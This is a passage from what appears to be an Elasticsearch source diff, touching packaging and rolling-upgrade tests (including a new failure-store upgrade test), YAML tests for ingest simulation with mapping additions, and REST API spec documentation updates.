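        System.out.println(combined.test("f1", false)); // false: not every cluster has f1
    }
}
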
+ responseMap.remove("terminated_early"); Map<String, Object> profile = (Map<String, Object>) responseMap.get("profile"); if (profile != null) { List<Map<String, Object>> shards = (List<Map<String, Object>>) profile.get("shards"); diff --git a/qa/packaging/src/test/java/org/elasticsearch/packaging/test/ArchiveTests.java b/qa/packaging/src/test/java/org/elasticsearch/packaging/test/ArchiveTests.java index 14178e84969ed..6bcd17a94c1d8 100644 --- a/qa/packaging/src/test/java/org/elasticsearch/packaging/test/ArchiveTests.java +++ b/qa/packaging/src/test/java/org/elasticsearch/packaging/test/ArchiveTests.java @@ -212,14 +212,14 @@ public void test50AutoConfigurationFailsWhenCertificatesNotGenerated() throws Ex FileUtils.assertPathsDoNotExist(installation.data); Path tempDir = createTempDir("bc-backup"); Files.move( - installation.lib.resolve("tools").resolve("security-cli").resolve("bcprov-jdk18on-1.78.1.jar"), - tempDir.resolve("bcprov-jdk18on-1.78.1.jar") + installation.lib.resolve("tools").resolve("security-cli").resolve("bcprov-jdk18on-1.79.jar"), + tempDir.resolve("bcprov-jdk18on-1.79.jar") ); Shell.Result result = runElasticsearchStartCommand(null, false, false); assertElasticsearchFailure(result, "java.lang.NoClassDefFoundError: org/bouncycastle/", null); Files.move( - tempDir.resolve("bcprov-jdk18on-1.78.1.jar"), - installation.lib.resolve("tools").resolve("security-cli").resolve("bcprov-jdk18on-1.78.1.jar") + tempDir.resolve("bcprov-jdk18on-1.79.jar"), + installation.lib.resolve("tools").resolve("security-cli").resolve("bcprov-jdk18on-1.79.jar") ); Platforms.onWindows(() -> sh.chown(installation.config)); FileUtils.rm(tempDir); diff --git a/qa/packaging/src/test/java/org/elasticsearch/packaging/test/PackagingTestCase.java b/qa/packaging/src/test/java/org/elasticsearch/packaging/test/PackagingTestCase.java index a157cc84e624e..2db2ebb618d02 100644 --- a/qa/packaging/src/test/java/org/elasticsearch/packaging/test/PackagingTestCase.java +++ b/qa/packaging/src/test/java/org/elasticsearch/packaging/test/PackagingTestCase.java @@ -145,6 +145,10 @@ public abstract class PackagingTestCase extends Assert { @Override protected void failed(Throwable e, Description description) { failed = true; + if (installation != null && installation.distribution.isDocker()) { + logger.warn("Test {} failed.
Printing logs for failed test...", description.getMethodName()); + dumpDebug(); + } } }; diff --git a/qa/packaging/src/test/java/org/elasticsearch/packaging/util/ServerUtils.java b/qa/packaging/src/test/java/org/elasticsearch/packaging/util/ServerUtils.java index ea71308b11940..f915388011ed9 100644 --- a/qa/packaging/src/test/java/org/elasticsearch/packaging/util/ServerUtils.java +++ b/qa/packaging/src/test/java/org/elasticsearch/packaging/util/ServerUtils.java @@ -150,7 +150,19 @@ private static HttpResponse execute(Request request, String username, String pas executor.auth(username, password); executor.authPreemptive(new HttpHost("localhost", 9200)); } - return executor.execute(request).returnResponse(); + try { + return executor.execute(request).returnResponse(); + } catch (Exception e) { + logger.warn( + "Failed to execute request [{}] with username/password [{}/{}] and caCert [{}]", + request.toString(), + username, + password, + caCert, + e + ); + throw e; + } } // polls every two seconds for Elasticsearch to be running on 9200 @@ -238,14 +250,13 @@ public static void waitForElasticsearch( long timeElapsed = 0; boolean started = false; Throwable thrownException = null; - if (caCert == null) { - caCert = getCaCert(installation); - } while (started == false && timeElapsed < waitTime) { if (System.currentTimeMillis() - lastRequest > requestInterval) { + if (caCert == null) { + caCert = getCaCert(installation); + } try { - final HttpResponse response = execute( Request.Get((caCert != null ? "https" : "http") + "://localhost:9200/_cluster/health") .connectTimeout((int) timeoutLength) @@ -276,7 +287,7 @@ public static void waitForElasticsearch( } started = true; - } catch (IOException e) { + } catch (Exception e) { if (thrownException == null) { thrownException = e; } else { diff --git a/qa/packaging/src/test/java/org/elasticsearch/packaging/util/docker/Docker.java b/qa/packaging/src/test/java/org/elasticsearch/packaging/util/docker/Docker.java index ab167d7663be1..a17ae7781db48 100644 --- a/qa/packaging/src/test/java/org/elasticsearch/packaging/util/docker/Docker.java +++ b/qa/packaging/src/test/java/org/elasticsearch/packaging/util/docker/Docker.java @@ -73,7 +73,7 @@ public class Docker { public static final Shell sh = new Shell(); public static final DockerShell dockerShell = new DockerShell(); public static final int STARTUP_SLEEP_INTERVAL_MILLISECONDS = 1000; - public static final int STARTUP_ATTEMPTS_MAX = 30; + public static final int STARTUP_ATTEMPTS_MAX = 45; /** * The length of the command exceeds what we can use for COLUMNS so we use diff --git a/qa/rolling-upgrade/src/javaRestTest/java/org/elasticsearch/upgrades/FailureStoreUpgradeIT.java b/qa/rolling-upgrade/src/javaRestTest/java/org/elasticsearch/upgrades/FailureStoreUpgradeIT.java new file mode 100644 index 0000000000000..66caca9c1c51a --- /dev/null +++ b/qa/rolling-upgrade/src/javaRestTest/java/org/elasticsearch/upgrades/FailureStoreUpgradeIT.java @@ -0,0 +1,229 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". 
+ */ + +package org.elasticsearch.upgrades; + +import com.carrotsearch.randomizedtesting.annotations.Name; + +import org.elasticsearch.client.Request; +import org.elasticsearch.client.Response; +import org.elasticsearch.client.ResponseException; +import org.elasticsearch.cluster.metadata.DataStream; +import org.elasticsearch.common.time.DateFormatter; +import org.elasticsearch.common.time.FormatNames; +import org.elasticsearch.test.rest.ObjectPath; + +import java.io.IOException; +import java.time.Instant; +import java.util.Map; + +import static org.elasticsearch.cluster.metadata.DataStreamTestHelper.backingIndexEqualTo; +import static org.elasticsearch.cluster.metadata.DataStreamTestHelper.dataStreamIndexEqualTo; +import static org.hamcrest.Matchers.anyOf; +import static org.hamcrest.Matchers.empty; +import static org.hamcrest.Matchers.equalTo; +import static org.hamcrest.Matchers.hasSize; +import static org.hamcrest.Matchers.is; +import static org.hamcrest.Matchers.not; +import static org.hamcrest.Matchers.notNullValue; + +public class FailureStoreUpgradeIT extends AbstractRollingUpgradeWithSecurityTestCase { + + public FailureStoreUpgradeIT(@Name("upgradedNodes") int upgradedNodes) { + super(upgradedNodes); + } + + final String INDEX_TEMPLATE = """ + { + "index_patterns": ["$PATTERN"], + "data_stream": {}, + "template": { + "mappings":{ + "properties": { + "@timestamp" : { + "type": "date" + }, + "numeral": { + "type": "long" + } + } + } + } + }"""; + + private static final String VALID_DOC = """ + {"@timestamp": "$now", "numeral": 0} + """; + + private static final String INVALID_DOC = """ + {"@timestamp": "$now", "numeral": "foobar"} + """; + + private static final String BULK = """ + {"create": {}} + {"@timestamp": "$now", "numeral": 0} + {"create": {}} + {"@timestamp": "$now", "numeral": 1} + {"create": {}} + {"@timestamp": "$now", "numeral": 2} + {"create": {}} + {"@timestamp": "$now", "numeral": 3} + {"create": {}} + {"@timestamp": "$now", "numeral": 4} + """; + + private static final String ENABLE_FAILURE_STORE_OPTIONS = """ + { + "failure_store": { + "enabled": true + } + } + """; + + public void testFailureStoreOnPreviouslyExistingDataStream() throws Exception { + assumeFalse( + "testing migration from data streams created before failure store feature existed", + oldClusterHasFeature(DataStream.DATA_STREAM_FAILURE_STORE_FEATURE) + ); + String dataStreamName = "fs-ds-upgrade-test"; + String failureStoreName = dataStreamName + "::failures"; + String templateName = "fs-ds-template"; + if (isOldCluster()) { + // Create template + var putIndexTemplateRequest = new Request("POST", "/_index_template/" + templateName); + putIndexTemplateRequest.setJsonEntity(INDEX_TEMPLATE.replace("$PATTERN", dataStreamName)); + assertOK(client().performRequest(putIndexTemplateRequest)); + + // Initialize data stream + executeBulk(dataStreamName); + + // Ensure document failure + indexDoc(dataStreamName, INVALID_DOC, false); + + // Check data stream state + var dataStreams = getDataStream(dataStreamName); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams"), hasSize(1)); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.name"), equalTo(dataStreamName)); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.generation"), equalTo(1)); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.template"), equalTo(templateName)); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.indices"), hasSize(1)); + String firstBackingIndex = ObjectPath.evaluate(dataStreams, 
"data_streams.0.indices.0.index_name"); + assertThat(firstBackingIndex, backingIndexEqualTo(dataStreamName, 1)); + + assertDocCount(client(), dataStreamName, 5); + } else if (isMixedCluster()) { + ensureHealth(dataStreamName, request -> request.addParameter("wait_for_status", "yellow")); + if (isFirstMixedCluster()) { + indexDoc(dataStreamName, VALID_DOC, true); + indexDoc(dataStreamName, INVALID_DOC, false); + } + assertDocCount(client(), dataStreamName, 6); + } else if (isUpgradedCluster()) { + ensureGreen(dataStreamName); + + // Ensure correct default failure store state for upgraded data stream + var dataStreams = getDataStream(dataStreamName); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams"), hasSize(1)); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.name"), equalTo(dataStreamName)); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.failure_store"), notNullValue()); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.failure_store.enabled"), equalTo(false)); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.failure_store.indices"), is(empty())); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.failure_store.rollover_on_write"), equalTo(true)); + + // Ensure invalid document is not indexed + indexDoc(dataStreamName, INVALID_DOC, false); + + // Enable failure store on upgraded data stream + var putOptionsRequest = new Request("PUT", "/_data_stream/" + dataStreamName + "/_options"); + putOptionsRequest.setJsonEntity(ENABLE_FAILURE_STORE_OPTIONS); + assertOK(client().performRequest(putOptionsRequest)); + + // Ensure correct enabled failure store state + dataStreams = getDataStream(dataStreamName); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams"), hasSize(1)); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.name"), equalTo(dataStreamName)); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.failure_store"), notNullValue()); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.failure_store.enabled"), equalTo(true)); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.failure_store.indices"), is(empty())); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.failure_store.rollover_on_write"), equalTo(true)); + + // Initialize failure store + int expectedFailureDocuments = 0; + if (randomBoolean()) { + // Index a failure via a mapping exception + indexDoc(dataStreamName, INVALID_DOC, true); + expectedFailureDocuments = 1; + } else { + // Manually rollover failure store to force initialization + var failureStoreRolloverRequest = new Request("POST", "/" + failureStoreName + "/_rollover"); + assertOK(client().performRequest(failureStoreRolloverRequest)); + } + + // Ensure correct initialized failure store state + dataStreams = getDataStream(dataStreamName); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams"), hasSize(1)); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.name"), equalTo(dataStreamName)); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.failure_store"), notNullValue()); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.failure_store.enabled"), equalTo(true)); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.failure_store.indices"), is(not(empty()))); + assertThat(ObjectPath.evaluate(dataStreams, "data_streams.0.failure_store.rollover_on_write"), equalTo(false)); + + String failureIndexName = ObjectPath.evaluate(dataStreams, "data_streams.0.failure_store.indices.0.index_name"); + 
assertThat(failureIndexName, dataStreamIndexEqualTo(dataStreamName, 2, true)); + + assertDocCount(client(), dataStreamName, 6); + assertDocCount(client(), failureStoreName, expectedFailureDocuments); + } + } + + private static void indexDoc(String dataStreamName, String docBody, boolean expectSuccess) throws IOException { + var indexRequest = new Request("POST", "/" + dataStreamName + "/_doc"); + indexRequest.addParameter("refresh", "true"); + indexRequest.setJsonEntity(docBody.replace("$now", formatInstant(Instant.now()))); + Response response = null; + try { + response = client().performRequest(indexRequest); + } catch (ResponseException re) { + response = re.getResponse(); + } + assertNotNull(response); + if (expectSuccess) { + assertOK(response); + } else { + assertThat(response.getStatusLine().getStatusCode(), not(anyOf(equalTo(200), equalTo(201)))); + } + } + + private static void executeBulk(String dataStreamName) throws IOException { + var bulkRequest = new Request("POST", "/" + dataStreamName + "/_bulk"); + bulkRequest.setJsonEntity(BULK.replace("$now", formatInstant(Instant.now()))); + bulkRequest.addParameter("refresh", "true"); + Response response = null; + try { + response = client().performRequest(bulkRequest); + } catch (ResponseException re) { + response = re.getResponse(); + } + assertNotNull(response); + var responseBody = entityAsMap(response); + assertOK(response); + assertThat("errors in response:\n " + responseBody, responseBody.get("errors"), equalTo(false)); + } + + static String formatInstant(Instant instant) { + return DateFormatter.forPattern(FormatNames.STRICT_DATE_OPTIONAL_TIME.getName()).format(instant); + } + + private static Map<String, Object> getDataStream(String dataStreamName) throws IOException { + var getDataStreamsRequest = new Request("GET", "/_data_stream/" + dataStreamName); + var response = client().performRequest(getDataStreamsRequest); + assertOK(response); + return entityAsMap(response); + } +} diff --git a/qa/rolling-upgrade/src/javaRestTest/java/org/elasticsearch/upgrades/RunningSnapshotIT.java b/qa/rolling-upgrade/src/javaRestTest/java/org/elasticsearch/upgrades/RunningSnapshotIT.java index 261e92c5d7b65..3e2dfa24e7237 100644 --- a/qa/rolling-upgrade/src/javaRestTest/java/org/elasticsearch/upgrades/RunningSnapshotIT.java +++ b/qa/rolling-upgrade/src/javaRestTest/java/org/elasticsearch/upgrades/RunningSnapshotIT.java @@ -12,12 +12,10 @@ import com.carrotsearch.randomizedtesting.annotations.Name; import org.elasticsearch.client.Request; -import org.elasticsearch.common.Strings; import org.elasticsearch.common.settings.Settings; import org.elasticsearch.test.rest.ObjectPath; import java.io.IOException; -import java.util.Collection; import java.util.Map; import java.util.stream.Collectors; @@ -26,7 +24,6 @@ import static org.hamcrest.Matchers.containsInAnyOrder; import static org.hamcrest.Matchers.empty; import static org.hamcrest.Matchers.equalTo; -import static org.hamcrest.Matchers.hasSize; import static org.hamcrest.Matchers.not; public class RunningSnapshotIT extends AbstractRollingUpgradeTestCase { @@ -45,6 +42,13 @@ public void testRunningSnapshotCompleteAfterUpgrade() throws Exception { .collect(Collectors.toUnmodifiableMap(Map.Entry::getKey, entry -> entry.getValue().get("name").toString())); assertThat(nodeIdToNodeNames.values(), containsInAnyOrder("test-cluster-0", "test-cluster-1", "test-cluster-2")); + final var lastUpgradeNodeId = nodeIdToNodeNames.entrySet() + .stream() + .filter(entry -> "test-cluster-2".equals(entry.getValue())) +
.map(Map.Entry::getKey) + .findFirst() + .orElseThrow(() -> new AssertionError("node id not found in " + nodeIdToNodeNames)); + if (isOldCluster()) { registerRepository(repositoryName, "fs", randomBoolean(), Settings.builder().put("location", "backup").build()); // create an index to have one shard per node @@ -54,54 +58,41 @@ public void testRunningSnapshotCompleteAfterUpgrade() throws Exception { indexDocs(indexName, between(10, 50)); } flush(indexName, true); - // Signal shutdown to prevent snapshot from being completed - putShutdownMetadata(nodeIdToNodeNames.keySet()); + // Signal shutdown for the last node to upgrade to prevent snapshot from being completed during the upgrade process + putShutdownMetadata(lastUpgradeNodeId); createSnapshot(repositoryName, snapshotName, false); assertRunningSnapshot(repositoryName, snapshotName); } else { if (isUpgradedCluster()) { - deleteShutdownMetadata(nodeIdToNodeNames.keySet()); - assertNoShutdownMetadata(nodeIdToNodeNames.keySet()); + deleteShutdownMetadata(lastUpgradeNodeId); + assertNoShutdownMetadata(lastUpgradeNodeId); ensureGreen(indexName); assertBusy(() -> assertCompletedSnapshot(repositoryName, snapshotName)); } else { - if (isFirstMixedCluster()) { - final var upgradedNodeIds = nodeIdToNodeNames.entrySet() - .stream() - .filter(entry -> "test-cluster-0".equals(entry.getValue())) - .map(Map.Entry::getKey) - .collect(Collectors.toUnmodifiableSet()); - assertThat(upgradedNodeIds, hasSize(1)); - deleteShutdownMetadata(upgradedNodeIds); - } assertRunningSnapshot(repositoryName, snapshotName); } } } - private void putShutdownMetadata(Collection<String> nodeIds) throws IOException { - for (String nodeId : nodeIds) { - final Request putShutdownRequest = new Request("PUT", "/_nodes/" + nodeId + "/shutdown"); - putShutdownRequest.setJsonEntity(""" - { - "type": "remove", - "reason": "test" - }"""); - client().performRequest(putShutdownRequest); - } + private void putShutdownMetadata(String nodeId) throws IOException { + final Request putShutdownRequest = new Request("PUT", "/_nodes/" + nodeId + "/shutdown"); + putShutdownRequest.setJsonEntity(""" + { + "type": "remove", + "reason": "test" + }"""); + client().performRequest(putShutdownRequest); } - private void deleteShutdownMetadata(Collection<String> nodeIds) throws IOException { - for (String nodeId : nodeIds) { - final Request request = new Request("DELETE", "/_nodes/" + nodeId + "/shutdown"); - request.addParameter(IGNORE_RESPONSE_CODES_PARAM, "404"); - client().performRequest(request); - } + private void deleteShutdownMetadata(String nodeId) throws IOException { + final Request request = new Request("DELETE", "/_nodes/" + nodeId + "/shutdown"); + request.addParameter(IGNORE_RESPONSE_CODES_PARAM, "404"); + client().performRequest(request); } - private void assertNoShutdownMetadata(Collection<String> nodeIds) throws IOException { + private void assertNoShutdownMetadata(String nodeId) throws IOException { final ObjectPath responsePath = assertOKAndCreateObjectPath( - client().performRequest(new Request("GET", "/_nodes/" + Strings.collectionToCommaDelimitedString(nodeIds) + "/shutdown")) + client().performRequest(new Request("GET", "/_nodes/" + nodeId + "/shutdown")) ); assertThat(responsePath.evaluate("nodes"), empty()); } diff --git a/qa/smoke-test-http/src/internalClusterTest/java/org/elasticsearch/http/snapshots/RestGetSnapshotsIT.java b/qa/smoke-test-http/src/internalClusterTest/java/org/elasticsearch/http/snapshots/RestGetSnapshotsIT.java index 683990d51d4a8..eb3b95ff27595 100644 --- 
a/qa/smoke-test-http/src/internalClusterTest/java/org/elasticsearch/http/snapshots/RestGetSnapshotsIT.java +++ b/qa/smoke-test-http/src/internalClusterTest/java/org/elasticsearch/http/snapshots/RestGetSnapshotsIT.java @@ -204,7 +204,7 @@ public void testSortAndPaginateWithInProgress() throws Exception { inProgressSnapshots.add(AbstractSnapshotIntegTestCase.startFullSnapshot(logger, repoName, snapshotName, false)); } AbstractSnapshotIntegTestCase.awaitNumberOfSnapshotsInProgress(logger, inProgressCount); - AbstractSnapshotIntegTestCase.awaitClusterState(logger, state -> { + AbstractSnapshotIntegTestCase.awaitClusterState(state -> { final var snapshotsInProgress = SnapshotsInProgress.get(state); boolean firstIndexSuccessfullySnapshot = snapshotsInProgress.asStream() .flatMap(s -> s.shards().entrySet().stream()) diff --git a/qa/smoke-test-ingest-with-all-dependencies/src/yamlRestTest/resources/rest-api-spec/test/ingest/80_ingest_simulate.yml b/qa/smoke-test-ingest-with-all-dependencies/src/yamlRestTest/resources/rest-api-spec/test/ingest/80_ingest_simulate.yml index ba4e73f0c5e09..2cccc8988ff0e 100644 --- a/qa/smoke-test-ingest-with-all-dependencies/src/yamlRestTest/resources/rest-api-spec/test/ingest/80_ingest_simulate.yml +++ b/qa/smoke-test-ingest-with-all-dependencies/src/yamlRestTest/resources/rest-api-spec/test/ingest/80_ingest_simulate.yml @@ -1740,3 +1740,194 @@ setup: - match: { docs.0.doc._source.abc: "sfdsfsfdsfsfdsfsfdsfsfdsfsfdsf" } - match: { docs.0.doc.ignored_fields: [ {"field": "abc"} ] } - not_exists: docs.0.doc.error + +--- +"Test mapping addition correctly respects mapping of indices without templates": + # In this test, we make sure that when an index has a mapping but was not built with a template, the + # mapping_addition respects the existing mapping for validation. + + - skip: + features: + - headers + - allowed_warnings + + # A global match-everything legacy template is added to the cluster sometimes (rarely). We have to get rid of this template if it exists + # because this test is making sure we get correct behavior when an index matches *no* template: + - do: + indices.delete_template: + name: '*' + ignore: 404 + + # We create the index no-template-index with an implicit mapping that has a foo field with type long: + - do: + bulk: + refresh: true + body: + - '{"index": {"_index": "no-template-index"}}' + - '{"foo": 3}' + + # Now we make sure that the existing mapping is taken into account when we simulate with a mapping_addition. Since + # the pre-existing mapping has foo mapped as a long, this ought to fail with a document_parsing_exception because + # we are attempting to write a boolean foo. + - do: + headers: + Content-Type: application/json + simulate.ingest: + index: no-template-index + body: > + { + "docs": [ + { + "_id": "test-id", + "_index": "no-template-index", + "_source": { + "@timestamp": "2025-07-25T09:06:06.929Z", + "is_valid": true, + "foo": true + } + } + ], + "mapping_addition": { + "properties": { + "is_valid": { + "type": "boolean" + } + } + } + } + - length: { docs: 1 } + - match: { docs.0.doc._index: "no-template-index" } + - match: { docs.0.doc._source.foo: true } + - match: { docs.0.doc._source.is_valid: true } + - match: { docs.0.doc.error.type: "document_parsing_exception" } + + # Now we add a template for this index.
+ - do: + indices.put_template: + name: my-template-1 + body: + index_patterns: no-template-index + mappings: + properties: + foo: + type: boolean + + # And we still expect the index's mapping to be used rather than the template: + - do: + headers: + Content-Type: application/json + simulate.ingest: + index: no-template-index + body: > + { + "docs": [ + { + "_id": "test-id", + "_index": "no-template-index", + "_source": { + "@timestamp": "2025-07-25T09:06:06.929Z", + "is_valid": true, + "foo": true + } + } + ], + "mapping_addition": { + "properties": { + "is_valid": { + "type": "boolean" + } + } + } + } + - length: { docs: 1 } + - match: { docs.0.doc._index: "no-template-index" } + - match: { docs.0.doc._source.foo: true } + - match: { docs.0.doc._source.is_valid: true } + - match: { docs.0.doc.error.type: "document_parsing_exception" } + +--- +"Test ingest simulate with mapping addition for data streams when write index has different mapping": + # In this test, we make sure that when a data stream's write index has a mapping that is different from the mapping + # in its template, and a mapping_addition is given, then the mapping_addition is applied to the mapping of the write + # index rather than the mapping of the template. + + - skip: + features: + - headers + - allowed_warnings + + - do: + cluster.put_component_template: + name: mappings_template + body: + template: + mappings: + dynamic: strict + properties: + foo: + type: boolean + bar: + type: boolean + + - do: + allowed_warnings: + - "index template [my-template-1] has index patterns [simple-data-stream1] matching patterns from existing older templates [global] with patterns (global => [*]); this template [my-template-1] will take precedence during new index creation" + indices.put_index_template: + name: my-template-1 + body: + index_patterns: [simple-data-stream1] + composed_of: + - mappings_template + data_stream: {} + + - do: + indices.create_data_stream: + name: simple-data-stream1 + - is_true: acknowledged + + - do: + cluster.health: + wait_for_status: yellow + + # Now that the data stream exists, we change the template to remove the mapping for bar. The write index still has the + # old mapping. + - do: + cluster.put_component_template: + name: mappings_template + body: + template: + mappings: + properties: + foo: + type: boolean + + # We expect the mapping_addition to be added to the mapping of the write index, which has a boolean bar field. So this + # simulate ingest ought to fail.
+ - do: + headers: + Content-Type: application/json + simulate.ingest: + index: simple-data-stream1 + body: > + { + "docs": [ + { + "_id": "asdf", + "_source": { + "@timestamp": 1234, + "bar": "baz" + } + } + ], + "mapping_addition": { + "properties": { + "baz": { + "type": "keyword" + } + } + } + } + - length: { docs: 1 } + - match: { docs.0.doc._index: "simple-data-stream1" } + - match: { docs.0.doc._source.bar: "baz" } + - match: { docs.0.doc.error.type: "document_parsing_exception" } diff --git a/rest-api-spec/build.gradle b/rest-api-spec/build.gradle index 7b73575f76ef3..f2142e8ba1c8d 100644 --- a/rest-api-spec/build.gradle +++ b/rest-api-spec/build.gradle @@ -90,4 +90,6 @@ tasks.named("yamlRestCompatTestTransform").configure ({ task -> task.skipTest("indices.create/21_synthetic_source_stored/field param - keep root array", "Synthetic source keep arrays now stores leaf arrays natively") task.skipTest("cluster.info/30_info_thread_pool/Cluster HTTP Info", "The search_throttled thread pool has been removed") task.skipTest("synonyms/80_synonyms_from_index/Fail loading synonyms from index if synonyms_set doesn't exist", "Synonyms do no longer fail if the synonyms_set doesn't exist") + task.skipTest("update/100_synthetic_source/keyword", "synthetic recovery source means _recovery_source field will not be present") + task.skipTest("update/100_synthetic_source/stored text", "synthetic recovery source means _recovery_source field will not be present") }) diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.delete_desired_balance.json b/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.delete_desired_balance.json index b5c4eaa7fc6f9..651773303389d 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.delete_desired_balance.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.delete_desired_balance.json @@ -1,8 +1,8 @@ { "_internal.delete_desired_balance":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/delete-desired-balance.html", - "description": "This API is a diagnostics API and the output should not be relied upon for building applications." + "url": null, + "description": "This API is a diagnostics API and the output should not be relied upon for building applications" }, "stability":"experimental", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.delete_desired_nodes.json b/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.delete_desired_nodes.json index 8b4759719a41b..03a9a1c8635ab 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.delete_desired_nodes.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.delete_desired_nodes.json @@ -1,8 +1,8 @@ { "_internal.delete_desired_nodes":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/delete-desired-nodes.html", - "description": "Deletes the desired nodes. Designed for indirect use by ECE/ESS and ECK. Direct use is not supported." + "url": null, + "description": "Designed for indirect use by ECE/ESS and ECK, direct use is not supported." 
}, "stability":"experimental", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.get_desired_balance.json b/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.get_desired_balance.json index 5922d77d99dc0..f2fccf852950b 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.get_desired_balance.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.get_desired_balance.json @@ -1,8 +1,8 @@ { "_internal.get_desired_balance":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/get-desired-balance.html", - "description": "This API is a diagnostics API and the output should not be relied upon for building applications." + "url": null, + "description": "This API is a diagnostics API and the output should not be relied upon for building applications" }, "stability":"experimental", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.get_desired_nodes.json b/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.get_desired_nodes.json index 8fa21ec042c35..cf9a0799cd124 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.get_desired_nodes.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.get_desired_nodes.json @@ -1,8 +1,8 @@ { "_internal.get_desired_nodes":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/get-desired-nodes.html", - "description": "Gets the latest desired nodes. Designed for indirect use by ECE/ESS and ECK. Direct use is not supported." + "url": null, + "description": "Gets the latest desired nodes" }, "stability":"experimental", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.prevalidate_node_removal.json b/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.prevalidate_node_removal.json index 8c945f2894f2f..39b9b85f36273 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.prevalidate_node_removal.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.prevalidate_node_removal.json @@ -1,10 +1,10 @@ { "_internal.prevalidate_node_removal": { "documentation":{ - "url": "https://www.elastic.co/guide/en/elasticsearch/reference/master/prevalidate-node-removal-api.html", + "url": null, "description":"Prevalidates node removal from the cluster" }, - "stability":"stable", + "stability":"experimental", "visibility":"private", "headers":{ "accept": [ "application/json"] diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.update_desired_nodes.json b/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.update_desired_nodes.json index b2cdc77ef8f82..ae5c3962790f8 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.update_desired_nodes.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/_internal.update_desired_nodes.json @@ -1,8 +1,8 @@ { "_internal.update_desired_nodes":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/update-desired-nodes.html", - "description": "Updates the desired nodes. Designed for indirect use by ECE/ESS and ECK. Direct use is not supported." + "url": null, + "description": "Designed for indirect use by ECE/ESS and ECK, direct use is not supported." 
}, "stability":"experimental", "visibility":"private", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/async_search.delete.json b/rest-api-spec/src/main/resources/rest-api-spec/api/async_search.delete.json index 7cfc14487a396..81ebbd2c1b348 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/async_search.delete.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/async_search.delete.json @@ -1,8 +1,8 @@ { "async_search.delete":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/async-search.html", - "description": "Deletes an async search by ID. If the search is still running, the search request will be cancelled. Otherwise, the saved search results are deleted." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-async-search-submit", + "description": "Delete an async search" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/async_search.get.json b/rest-api-spec/src/main/resources/rest-api-spec/api/async_search.get.json index 41cf08b631092..e1ea50e349850 100644 --- a/rest-api-spec/src/main/resources/rest-api-spec/api/async_search.get.json +++ b/rest-api-spec/src/main/resources/rest-api-spec/api/async_search.get.json @@ -1,8 +1,8 @@ { "async_search.get":{ "documentation":{ - "url":"https://www.elastic.co/guide/en/elasticsearch/reference/current/async-search.html", - "description": "Retrieves the results of a previously submitted async search request given its ID." + "url":"https://www.elastic.co/docs/api/doc/elasticsearch/operation/operation-async-search-submit", + "description": "Get async search results" }, "stability":"stable", "visibility":"public", diff --git a/rest-api-spec/src/main/resources/rest-api-spec/api/async_search.status.json b/rest-api-spec/src/main/resources/rest-api-spec/api/async_search.status.json index 